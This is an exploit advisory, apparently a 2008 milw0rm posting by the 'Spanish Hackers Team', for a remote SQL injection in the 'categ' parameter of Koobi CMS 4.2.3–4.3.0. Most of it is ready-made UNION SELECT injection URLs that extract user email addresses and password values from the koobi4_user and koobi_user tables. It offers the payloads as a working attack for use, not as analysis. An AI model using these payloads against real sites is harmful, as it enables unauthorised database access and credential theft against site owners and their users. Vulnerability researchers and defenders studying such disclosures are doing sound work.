--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ Koobi CMS 4.3.0 - 4.2.3 (index.php categ) Remote SQL Injection +==-- --==+====================================================================================+==-- [+] [JosS] + [Spanish Hackers Team] + [Sys - Project] [+] Info: [~] Software: Koobi CMS 4.3.0 - 4.2.3 [~] HomePage: http://www.dream4.de/ [~] Exploit: Remote SQL Injection [High] [~] Where: index.php [~] Bug Found By: JosS [~] Contact: sys-project[at]hotmail.com [~] Web: http://www.spanish-hackers.com [+] Exploit v4.3.0 - v4.2.4: [~] Table: koobi4_user [~] /index.php?showlink=1&fid=8&p=links&area=1&categ=[SQL] [~] /index.php?showlink=1&fid=8&p=links&area=1&categ=-4+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/* [+] Exploit v4.2.3: [~] Table_ koobi_user [~] /index.php?showlink=1&fid=8&p=links&area=1&categ=[SQL] [~] /index.php?showlink=1&fid=8&p=links&area=1&categ=-4+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi_user/* --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ JosS +==-- --==+====================================================================================+==-- [+] [The End] # milw0rm.com [2008-02-29]